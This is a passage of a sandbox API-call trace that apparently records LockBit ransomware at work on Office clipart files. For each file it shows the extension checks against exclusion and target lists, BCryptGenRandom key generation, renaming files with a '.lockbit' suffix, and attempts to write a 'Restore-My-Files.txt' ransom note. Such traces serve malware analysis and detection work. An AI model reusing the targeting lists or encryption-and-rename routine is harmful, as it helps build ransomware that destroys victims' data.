dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0118.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0118.172] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0118.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.269] malloc (_Size=0xa6) returned 0x77d7a8 [0118.270] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0118.270] free (_Block=0x77d7a8) [0118.270] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.270] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.270] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1cac, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01242_.WMF", cAlternateFileName="")) returned 1 [0118.270] lstrcmpiW (lpString1=".", lpString2="HH01242_.WMF") returned -1 [0118.270] lstrcmpiW (lpString1="..", lpString2="HH01242_.WMF") returned -1 [0118.270] PathFindExtensionW (pszPath="HH01242_.WMF") returned=".WMF" [0118.270] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.270] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.271] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.271] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01242_.WMF") returned 1 [0118.272] lstrcmpiW (lpString1="ntldr", lpString2="HH01242_.WMF") returned 1 [0118.272] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01242_.WMF") returned 1 [0118.272] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01242_.WMF") returned -1 [0118.272] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01242_.WMF") returned -1 [0118.272] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01242_.WMF") returned 1 [0118.272] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01242_.WMF") returned 1 [0118.272] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.272] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF") returned=".WMF" [0118.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.272] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.272] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.273] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.273] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.lockbit") returned 72 [0118.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.278] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.278] malloc (_Size=0x40068) returned 0x3d70450 [0118.278] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=7340) returned 1 [0118.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0118.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0118.280] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.282] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.282] malloc (_Size=0xa6) returned 0x77d7a8 [0118.282] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.283] free (_Block=0x77d7a8) [0118.283] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.283] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.283] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.283] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3dbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01291_.WMF", cAlternateFileName="")) returned 1 [0118.283] lstrcmpiW (lpString1=".", lpString2="HH01291_.WMF") returned -1 [0118.283] lstrcmpiW (lpString1="..", lpString2="HH01291_.WMF") returned -1 [0118.283] PathFindExtensionW (pszPath="HH01291_.WMF") returned=".WMF" [0118.283] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.283] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.284] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.284] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.285] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01291_.WMF") returned 1 [0118.285] lstrcmpiW (lpString1="ntldr", lpString2="HH01291_.WMF") returned 1 [0118.285] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH01291_.WMF") returned 1 [0118.285] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH01291_.WMF") returned -1 [0118.285] lstrcmpiW (lpString1="autorun.inf", lpString2="HH01291_.WMF") returned -1 [0118.285] lstrcmpiW (lpString1="thumbs.db", lpString2="HH01291_.WMF") returned 1 [0118.285] lstrcmpiW (lpString1="iconcache.db", lpString2="HH01291_.WMF") returned 1 [0118.285] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.285] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF") returned=".WMF" [0118.286] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.286] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.286] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.287] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.287] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.287] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.287] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.287] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.lockbit") returned 72 [0118.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0118.287] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.288] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.288] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15806) returned 1 [0118.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.289] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.293] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.293] malloc (_Size=0xa6) returned 0x77d7a8 [0118.293] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.294] free (_Block=0x77d7a8) [0118.294] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.294] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.294] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.294] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1780, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH01329_.WMF", cAlternateFileName="")) returned 1 [0118.294] lstrcmpiW (lpString1=".", lpString2="HH01329_.WMF") returned -1 [0118.294] lstrcmpiW (lpString1="..", lpString2="HH01329_.WMF") returned -1 [0118.294] PathFindExtensionW (pszPath="HH01329_.WMF") returned=".WMF" [0118.294] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.294] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.294] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.294] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.294] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.295] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.296] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.296] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.297] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH01329_.WMF") returned 1 [0118.297] lstrcmpiW (lpString1="ntldr", lpString2="HH01329_.WMF") returned 1 